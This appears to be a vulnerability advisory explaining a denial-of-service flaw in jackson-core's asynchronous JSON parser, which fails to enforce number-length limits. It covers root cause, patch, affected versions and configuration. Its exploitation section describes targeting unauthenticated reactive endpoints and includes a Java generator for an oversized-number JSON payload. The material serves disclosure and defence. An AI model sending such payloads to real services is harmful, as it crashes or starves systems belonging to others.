Feb 28, 2026 · 6 min read
The non-blocking Jackson parser ignores `maxNumberLength` constraints, allowing attackers to send arbitrarily long numbers. This causes Denial of Service (DoS) in reactive Java applications via memory and CPU exhaustion.
A significant oversight in the FasterXML jackson-core library's non-blocking (asynchronous) JSON parser allows for the bypass of `StreamReadConstraints`, specifically regarding numeric value lengths. While the standard blocking parser correctly enforces these limits to prevent Denial of Service (DoS) attacks, the async implementation fails to validate the length of incoming integer and floating-point values against the configured maximums. This discrepancy exposes applications using reactive stacks—such as Spring WebFlux, Vert.x, or Micronaut—to resource exhaustion attacks where specially crafted JSON payloads can trigger excessive memory allocation or CPU consumption.
The jackson-core library is the foundation of JSON processing in the Java ecosystem, underpinning virtually all major frameworks including Spring Boot, AWS SDKs, and Spark. In version 2.15.0, FasterXML introduced StreamReadConstraints to proactively mitigate Denial of Service (DoS) vectors. These constraints allow developers to define hard limits on input characteristics, such as the maximum length of a number or string, preventing the parser from attempting to process malicious payloads designed to consume excessive resources.
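These limits are opt-in to tighten: the sketch below (class name `ConstraintsConfig` is illustrative; the builder methods are the real jackson-core 2.15+ API) builds a `JsonFactory` with a stricter number-length cap than the library default of 1000 characters.

```java
import com.fasterxml.jackson.core.JsonFactory;
import com.fasterxml.jackson.core.StreamReadConstraints;

public class ConstraintsConfig {
    // Build a JsonFactory with a stricter number-length limit than the
    // library default of 1000 characters (jackson-core 2.15+ API).
    public static JsonFactory strictFactory() {
        StreamReadConstraints constraints = StreamReadConstraints.builder()
                .maxNumberLength(100)       // reject numeric tokens over 100 chars
                .maxStringLength(1_000_000) // cap string values as well
                .build();
        return JsonFactory.builder()
                .streamReadConstraints(constraints)
                .build();
    }

    public static void main(String[] args) {
        System.out.println(strictFactory().streamReadConstraints().getMaxNumberLength());
    }
}
```

Any `ObjectMapper` constructed from this factory inherits the constraints, so the limits apply uniformly across an application's JSON handling.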
However, a discrepancy exists in how these constraints are applied across different parsing modes. Jackson supports both blocking I/O (handling InputStream or Reader) and non-blocking I/O (handling byte feeds asynchronously). The vulnerability GHSA-72hv-8253-57qq resides specifically in the non-blocking parser implementation, NonBlockingUtf8JsonParserBase. This component is critical for reactive applications that process JSON data in chunks without blocking threads, a pattern common in modern high-throughput microservices.
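To make the non-blocking mode concrete, here is a minimal sketch of the chunked feed-and-poll pattern (the class name `AsyncParseDemo` and the chunking scheme are mine; `createNonBlockingByteArrayParser`, `ByteArrayFeeder`, and `JsonToken.NOT_AVAILABLE` are the real jackson-core async APIs):

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;

import com.fasterxml.jackson.core.JsonFactory;
import com.fasterxml.jackson.core.JsonToken;
import com.fasterxml.jackson.core.async.ByteArrayFeeder;
import com.fasterxml.jackson.core.json.async.NonBlockingJsonParser;

public class AsyncParseDemo {
    // Feed JSON to the async parser in fixed-size chunks and count the
    // tokens it emits; NOT_AVAILABLE signals that more input is needed.
    public static int countTokens(byte[] json, int chunkSize) {
        try {
            NonBlockingJsonParser parser = (NonBlockingJsonParser)
                    new JsonFactory().createNonBlockingByteArrayParser();
            ByteArrayFeeder feeder = parser.getNonBlockingInputFeeder();
            int tokens = 0;
            for (int off = 0; off < json.length; off += chunkSize) {
                int end = Math.min(off + chunkSize, json.length);
                feeder.feedInput(json, off, end); // (start, end) offsets
                JsonToken t;
                while ((t = parser.nextToken()) != null
                        && t != JsonToken.NOT_AVAILABLE) {
                    tokens++;
                }
            }
            feeder.endOfInput();
            JsonToken t;
            while ((t = parser.nextToken()) != null
                    && t != JsonToken.NOT_AVAILABLE) {
                tokens++; // drain any tokens finalized by end-of-input
            }
            return tokens;
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        byte[] json = "{\"data\": 42}".getBytes(StandardCharsets.UTF_8);
        System.out.println(countTokens(json, 4));
    }
}
```

This is the code path the vulnerability lives in: because the parser must tolerate a number token spanning many `feedInput` calls, its finalization logic is separate from the blocking parser's, and that is where the length check was missed.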
Due to this flaw, the non-blocking parser fails to enforce the maxNumberLength constraint. Consequently, while a standard synchronous application would reject a JSON number consisting of one million digits, a reactive application using the vulnerable version of Jackson would attempt to buffer and parse it. This allows an unauthenticated remote attacker to force the application to allocate massive amounts of memory for the TextBuffer or burn CPU cycles attempting to convert the oversized text into a numeric type.
The root cause of this vulnerability lies in the state machine logic of the NonBlockingUtf8JsonParserBase class. Unlike the blocking parser, which reads sequentially from a stream, the non-blocking parser maintains a complex internal state to handle partial data availability. It processes input byte-by-byte, accumulating characters into a TextBuffer when it detects it is inside a JSON number token. The parser transitions through various states (e.g., INT_0, INT_1... FLOAT_EXP) as it validates the numeric format.
When the parser determines that a numeric token has ended (for example, by encountering a delimiter like a comma or closing brace), it finalizes the token. In the blocking implementation, this finalization step includes an explicit check against StreamReadConstraints.maxNumberLength. If the accumulated length in the TextBuffer exceeds the limit (defaulting to 1000 characters), the parser immediately throws a StreamConstraintsException.
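The blocking-side enforcement can be observed directly. The sketch below (class name `BlockingLimitDemo` is illustrative; the jackson-core APIs are real as of 2.15+) feeds the synchronous parser a number longer than the default 1000-character limit and checks that it is rejected with a `StreamConstraintsException`:

```java
import java.io.IOException;

import com.fasterxml.jackson.core.JsonFactory;
import com.fasterxml.jackson.core.JsonParser;
import com.fasterxml.jackson.core.exc.StreamConstraintsException;

public class BlockingLimitDemo {
    // Parse a document whose numeric value is `digits` characters long and
    // report whether the blocking parser rejected it.
    public static boolean rejectsOversizedNumber(int digits) {
        StringBuilder sb = new StringBuilder(digits + 16);
        sb.append("{\"data\": ");
        for (int i = 0; i < digits; i++) sb.append('9');
        sb.append('}');
        try (JsonParser p = new JsonFactory().createParser(sb.toString())) {
            while (p.nextToken() != null) {
                p.getText(); // force full materialization of each token
            }
            return false;
        } catch (StreamConstraintsException e) {
            return true; // default maxNumberLength (1000) was exceeded
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(rejectsOversizedNumber(2000)); // over the limit
        System.out.println(rejectsOversizedNumber(500));  // within the limit
    }
}
```

Running the same oversized document through the vulnerable non-blocking parser is exactly what this check fails to reproduce.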
In the vulnerable non-blocking implementation, this validation step was omitted during the state transition that finalizes the number. The parser correctly identifies the end of the number and transitions the state to VALUE_NUMBER_INT or VALUE_NUMBER_FLOAT, but it essentially "forgets" to consult the constraints configuration. This oversight permits the TextBuffer to grow unboundedly as long as the input stream continues to provide valid numeric characters, bypassing the safety mechanisms intended to protect the heap.
The fix involves explicitly invoking the validation logic within the async parser's update loop. The patch ensures that before a number is marked as complete, its length is validated against the active StreamReadConstraints.
Vulnerable Logic (Conceptual): In the vulnerable versions (e.g., 2.15.3), the parser would simply return the token without length checks once the number boundary was detected:
```java
// Inside NonBlockingUtf8JsonParserBase (conceptual)
// ... state machine handling ...
if (c == INT_SPACE) {
    // End of number detected: the token is finalized with NO length check
    _textBuffer.setCurrentLength(_textBuffer.size());
    return _valueComplete(JsonToken.VALUE_NUMBER_INT);
}
```

Patched Logic:
In the fixed versions (2.15.4, 2.16.2), calls to `_streamReadConstraints.validateIntegerLength()` are inserted, effectively guarding the token finalization:
```java
// Inside NonBlockingUtf8JsonParserBase (conceptual)
// ... state machine handling ...
if (c == INT_SPACE) {
    // PATCH: validate length against StreamReadConstraints before finalizing
    int len = _textBuffer.size();
    _streamReadConstraints.validateIntegerLength(len);
    _textBuffer.setCurrentLength(len);
    return _valueComplete(JsonToken.VALUE_NUMBER_INT);
}
```

This pattern is repeated for floating-point numbers using `validateFPLength()`. By injecting this check directly into the state transition, the parser ensures that no numeric token exceeding the configured limit can ever be successfully instantiated or passed to the calling application.
Exploiting this vulnerability requires sending a malformed JSON payload to an endpoint backed by a reactive stack (e.g., Spring WebFlux, Vert.x, or direct Netty usage with Jackson). The attacker does not need authentication if the endpoint is public. The payload consists of a valid JSON structure containing a numeric value with an extreme number of digits.
Attack Scenario:

- Fingerprinting: `Transfer-Encoding: chunked` handling or specific framework fingerprints can hint at non-blocking processing.
- Payload: `{"data": 12345...}`, where the number sequence continues for megabytes or gigabytes.

Result:
As the number grows, the application's heap usage increases linearly. Eventually, the application encounters an OutOfMemoryError (OOM), causing the JVM to crash or become unresponsive. Alternatively, if the memory is sufficient but the application attempts to convert this token to a BigInteger or BigDecimal, the conversion process (which can be computationally expensive for massive numbers) will spike CPU usage to 100%, causing a thread starvation Denial of Service.
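Generating such a payload requires nothing beyond the standard library. The sketch below (class name `PayloadSketch` is mine) builds a syntactically valid JSON body with a single oversized numeric value:

```java
public class PayloadSketch {
    // Build a syntactically valid JSON body whose single numeric value is
    // `digits` characters long (leading '1' avoids an invalid leading zero).
    public static String oversizedNumberPayload(int digits) {
        StringBuilder sb = new StringBuilder(digits + 16);
        sb.append("{\"data\": ").append('1');
        for (int i = 1; i < digits; i++) sb.append('9');
        return sb.append('}').toString();
    }

    public static void main(String[] args) {
        // A ~10 MB number; a real attack could stream this for gigabytes.
        System.out.println(oversizedNumberPayload(10_000_000).length());
    }
}
```

Against a patched parser this body is rejected as soon as the number exceeds `maxNumberLength`; against the vulnerable async parser it is buffered in full.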
The impact of this vulnerability is strictly Availability. There is no risk to Confidentiality or Integrity, as the attacker cannot read data or modify system state beyond causing a crash. However, in the context of modern microservices, availability is a critical security property. A single unauthenticated request can take down an entire service instance.
Severity Drivers:
The vulnerability is particularly dangerous for "Gateway" services or sidecars that parse JSON bodies before forwarding requests, as these are often the first line of defense and handle high volumes of traffic. The lack of a standard CVE assignment at the time of discovery means the issue can slip past vulnerability scanners that rely solely on NVD data, making awareness of the GHSA ID critical.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

| Product | Affected Versions | Fixed Version |
|---|---|---|
| FasterXML jackson-core | >= 2.15.0, < 2.15.4 | 2.15.4 |
| FasterXML jackson-core | >= 2.16.0, < 2.16.2 | 2.16.2 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-770 |
| Attack Vector | Network |
| CVSS Score | 7.5 (High) |
| Impact | Denial of Service (DoS) |
| Affected Component | NonBlockingUtf8JsonParserBase |
| Exploit Status | PoC Available |
CWE-770, Allocation of Resources Without Limits or Throttling, describes this flaw precisely: the async parser lets attacker-controlled input grow the TextBuffer without any enforced bound.